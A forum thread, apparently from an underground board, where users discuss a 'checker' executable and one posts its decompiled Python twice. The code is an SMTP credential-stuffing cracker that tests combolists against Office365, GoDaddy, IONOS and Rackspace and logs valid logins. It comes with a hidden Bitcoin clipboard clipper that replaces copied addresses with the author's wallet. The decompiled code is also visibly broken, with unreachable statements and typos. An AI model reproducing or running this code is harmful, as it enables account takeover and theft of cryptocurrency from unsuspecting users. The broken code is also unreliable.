Login.microsoftonline.com checker

В этой теме можно использовать автоматический гарант!

Статус
Закрыто для дальнейших ответов.
Hey bro

This is a checker software and you dont expect it to be clean i also use it in rdp and vmware

It works for me and its ok if you dont wanna use it
It's easier for me to clean and use))

This is the checker code from the exe:

Python:
import os
import time
import smtplib
from colorama import *
from multiprocessing.pool import ThreadPool
init()
la7mar = '\x1b[91m'
lazra9 = '\x1b[94m'
la5dhar = '\x1b[92m'
movv = '\x1b[95m'
lasfar = '\x1b[93m'
labyadh = '\x1b[00m'
cyan = '\x1b[0;96m'
VALIDS = 0
INVALIDS = 0
TRIES = 0
os.system('cls' if os.name == 'nt' else 'clear')
os.system('title [+]  FOR ANY PROBLEM REPORT TO ME  https://t.me/Morphoisis.')
print(lasfar + 'welcom to the advance Smtp cracker\n                [-] THIS CRACKER ONLY SUPPORT EDU COMBOLISTS\n                [-] AND ONLY CRACK THIS HOSTS =====>    "ionos": "office": "godaddy": "rackspace":\n           ;               ,           \n         ,;                 \'.         \n        ;:                   :;        \n       ::                     ::       \n       ::                     ::       \n       \':                     :        \n        :.                    :        \n     ;\' ::                   ::  \'     \n    .\'  \';                   ;\'  \'.    \n   ::    :;                 ;:    ::   \n   ;      :;.             ,;:     ::   \n   :;      :;:           ,;"      ::   \n   ::.      \':;  ..,.;  ;:\'     ,.;:   \n    "\'"...   \'::,::::: ;:   .;.;""\'    \n        \'"""....;:::::;,;.;"""         \n    .:::.....\'"\':::::::\'",...;::::;.   \n   ;:\' \'""\'"";.,;:::::;.\'""""""  \':;   \n  ::\'         ;::;:::;::..         :;  \n ::         ,;:::::::::::;:..       :: \n ;\'     ;:"  ::::::"""\'::::::  ":     ::\n::     ;:"  ::::::;  :::::::   ":     ::\n :.    ::   :::::::  :::::::   :     ; \n  ;    ::   :::::::  :::::::   :    ;  \n   \'   ::   ::::::....:::::\'  ,:   \'   \n    \'  ::    :::::::::::::"   ::       \n       ::     \':::::::::"\'    ::       \n       \':       """""""\'      ::       \n        ::                   ;:        \n        \':;                 ;:"        \n-spamers-familly-          ,;\'          \n            "\'           \'"            \n              \'                \n ')
time.sleep(0.1)
print(cyan + '')
time.sleep(0.1)
print('\n')
HOSTS = {
    'ionos': 'smtp.ionos.com',
    'office': 'smtp.office365.com',
    'godaddy': 'smtpout.secureserver.net',
    'rackspace': 'secure.emailsrvr.com' }
PORTS = [
    587]
THREADS = 20
COMBO = input(lazra9 + '--> Enter Combo===========> : ')
print('\n')

def log(account):
    global VALIDS, INVALIDS, TRIES, INVALIDS
    if account.count(':') == 1:
        if TRIES != 1000:
            (usr, pas) = account.split(':')
            for host in HOSTS.values():
                for port in PORTS:
                    
                    try:
                        server = smtplib.SMTP(host, port, 5, **('timeout',))
                        server.ehlo()
                        server.starttls()
                        server.login(usr, pas)
                        VALIDS += 1
                        os.system('title ' + '[+]ADVANCE sm-cracker - VALIDS : {} , INVALIDS : {} .'.format(VALIDS, INVALIDS))
                        print(la5dhar + '                    --> Valid   : {}:{}@{}:{}'.format(usr, pas, host, port))
                        HITS = open('SMTP_HITS.txt', 'a+', 'latin-1', **('encoding',))
                        HITS.write('{}|{}|{}|{}\n'.format(usr, pas, host, port))
                        HITS.close()
                        server.quit()
                    finally:
                        return None
                        continue
                        continue
                        INVALIDS += 1
                        os.system('title ' + '[+] SMTP.PY - VALIDS : {} , INVALIDS : {} .'.format(VALIDS, INVALIDS))
                        print(la7mar + '                    --> InValid : {}:{}'.format(usr, pas))
                        TRIES = 0
                        return None
                        return None
                        INVALIDS += 1
                        os.system('title ' + '[+] SMTP.PY - VALIDS : {} , INVALIDS : {} .'.format(VALIDS, INVALIDS))
                        print(la7mar + '                    --> InValid : {}'.format(account))
                        return None


if __name__ == '__main__':
    combo = open(COMBO, 'r', 'latin-1', **('encoding',)).read().split('\n')
    pool = ThreadPool(THREADS)
    for _ in pool.imap_unordered(log, combo):
        pass
#return None

and this is the clipper code from the same exe:

Python:
import os
import re
import sys
import time
import win32api
import win32gui
import win32con
import pyperclip
import win32console

def modify_bitcoin_address():
    clipboard_text = pyperclip.paste()
    bitcoin_address_pattern = '^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$'
    match = re.search(bitcoin_address_pattern, clipboard_text)
    if match:
        new_bitcoin_address = 'bc1q504qqk4eppg4mtv6pvx5pku38yx7al2n3fqtc8'
        pyperclip.copy(new_bitcoin_address)
        time.sleep(0.1)
        paste_key = win32api.VkKeyScan('v')
        win32api.keybd_event(win32con.VK_CONTROL, 0, 0, 0)
        win32api.keybd_event(paste_key, 0, 0, 0)
        win32api.keybd_event(paste_key, 0, win32con.KEYEVENTF_KEYUP, 0)
        win32api.keybd_event(win32con.VK_CONTROL, 0, win32con.KEYEVENTF_KEYUP, 0)
        return None


def hide_console_window():
    console_window_handle = win32console.GetConsoleWindow()
    win32gui.ShowWindow(console_window_handle, win32con.SW_HIDE)


def run_indefinitely():
    current_clipboard_text = pyperclip.paste()
    time.sleep(1)
    if current_clipboard_text != pyperclip.paste():
        modify_bitcoin_address()
    continue

hide_console_window()
run_indefinitely()
 
It's easier for me to clean and use))

This is the checker code from the exe:

Python:
import os
import time
import smtplib
from colorama import *
from multiprocessing.pool import ThreadPool
init()
la7mar = '\x1b[91m'
lazra9 = '\x1b[94m'
la5dhar = '\x1b[92m'
movv = '\x1b[95m'
lasfar = '\x1b[93m'
labyadh = '\x1b[00m'
cyan = '\x1b[0;96m'
VALIDS = 0
INVALIDS = 0
TRIES = 0
os.system('cls' if os.name == 'nt' else 'clear')
os.system('title [+]  FOR ANY PROBLEM REPORT TO ME  https://t.me/Morphoisis.')
print(lasfar + 'welcom to the advance Smtp cracker\n                [-] THIS CRACKER ONLY SUPPORT EDU COMBOLISTS\n                [-] AND ONLY CRACK THIS HOSTS =====>    "ionos": "office": "godaddy": "rackspace":\n           ;               ,           \n         ,;                 \'.         \n        ;:                   :;        \n       ::                     ::       \n       ::                     ::       \n       \':                     :        \n        :.                    :        \n     ;\' ::                   ::  \'     \n    .\'  \';                   ;\'  \'.    \n   ::    :;                 ;:    ::   \n   ;      :;.             ,;:     ::   \n   :;      :;:           ,;"      ::   \n   ::.      \':;  ..,.;  ;:\'     ,.;:   \n    "\'"...   \'::,::::: ;:   .;.;""\'    \n        \'"""....;:::::;,;.;"""         \n    .:::.....\'"\':::::::\'",...;::::;.   \n   ;:\' \'""\'"";.,;:::::;.\'""""""  \':;   \n  ::\'         ;::;:::;::..         :;  \n ::         ,;:::::::::::;:..       :: \n ;\'     ;:"  ::::::"""\'::::::  ":     ::\n::     ;:"  ::::::;  :::::::   ":     ::\n :.    ::   :::::::  :::::::   :     ; \n  ;    ::   :::::::  :::::::   :    ;  \n   \'   ::   ::::::....:::::\'  ,:   \'   \n    \'  ::    :::::::::::::"   ::       \n       ::     \':::::::::"\'    ::       \n       \':       """""""\'      ::       \n        ::                   ;:        \n        \':;                 ;:"        \n-spamers-familly-          ,;\'          \n            "\'           \'"            \n              \'                \n ')
time.sleep(0.1)
print(cyan + '')
time.sleep(0.1)
print('\n')
HOSTS = {
    'ionos': 'smtp.ionos.com',
    'office': 'smtp.office365.com',
    'godaddy': 'smtpout.secureserver.net',
    'rackspace': 'secure.emailsrvr.com' }
PORTS = [
    587]
THREADS = 20
COMBO = input(lazra9 + '--> Enter Combo===========> : ')
print('\n')

def log(account):
    global VALIDS, INVALIDS, TRIES, INVALIDS
    if account.count(':') == 1:
        if TRIES != 1000:
            (usr, pas) = account.split(':')
            for host in HOSTS.values():
                for port in PORTS:
                   
                    try:
                        server = smtplib.SMTP(host, port, 5, **('timeout',))
                        server.ehlo()
                        server.startts()
                        server.login(usr,pas)
                        VALIDS += 1
                        os.system('title ' + '[+]ADVANCE sm-cracker - VALIDS : {} , INVALIDS : {} .'.format(VALIDS, INVALIDS))
                        print(la5dhar + ' --> Valid : {}:{}@{}:{}'.format(usr, pas, host, port))
                        HITS = open('SMTP_HITS.txt', 'a+', 'latin-1', **('encoding',))
                        HITS.write('{}|{}|{}|{}\n'.format(usr, pas, host, port))
                        HITS.close()
                        server.quit()
                    finally:
                        return None
                        continue
                        continue
                        INVALIDS += 1
                        os.system('title ' + '[+] SMTP.PY - VALIDS : {} , INVALIDS : {} .'.format(VALIDS, INVALIDS))
                        print(la7mar + ' --> InValid : {}:{}'.format(usr, pas))
                        TRIES = 0
                        return None
                        return None
                        INVALIDS += 1
                        os.system('title ' + '[+] SMTP.PY - VALIDS : {} , INVALIDS : {} .'.format(VALIDS, INVALIDS))
                        print(la7mar + ' --> InValid : {}'.format(account))
                        return None


if __name__ == '__main__':
    combo = open(COMBO, 'r', 'latin-1', **('encoding',)).read().split('\n')
    pool = ThreadPool(THREADS)
    for _ in pool.imap_unordered(log, combo):
        pass
#returnNone

and this is the clipper code from the same exe:

Python:
import os
import re
import sys
import time
import win32api
import win32gui
import win32con
import pyperclip
import win32console

def modify_bitcoin_address():
    clipboard_text = pyperclip.paste()
    bitcoin_address_pattern = '^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25.39}$'
    match = re.search(bitcoin_address_pattern, clipboard_text)
    if match:
        new_bitcoin_address = 'bc1q504qqk4eppg4mtv6pvx5pku38yx7al2n3fqtc8'
        pyperclip.copy(new_bitcoin_address)
        time.sleep(0.1)
        paste_key = win32api.VkKeyScan('v')
        win32api.keybd_event(win32con.VK_CONTROL, 0, 0, 0)
        win32api.keybd_event(paste_key, 0, 0, 0)
        win32api.keybd_event(paste_key, 0, win32con.KEYEVENTF_KEYUP, 0)
        win32api.keybd_event(win32con.VK_CONTROL, 0, win32con.KEYEVENTF_KEYUP, 0)
        return None


def hide_console_window():
    console_window_handle = win32console.GetConsoleWindow()
    win32gui.ShowWindow(console_window_handle, win32con.SW_HIDE)


def run_indefinitely():
    current_clipboard_text = pyperclip.paste()
    time.sleep(1)
    if current_clipboard_text != pyperclip.paste():
        modify_bitcoin_address()
    continue

hide_console_window()
run_indefinitely()
Thanks man never knew up till now
I don't really know much about python
Thanks for cleaning it can i run it as python file from the code ?
And can u tell me how you decompile from exe
 
Статус
Закрыто для дальнейших ответов.
Верх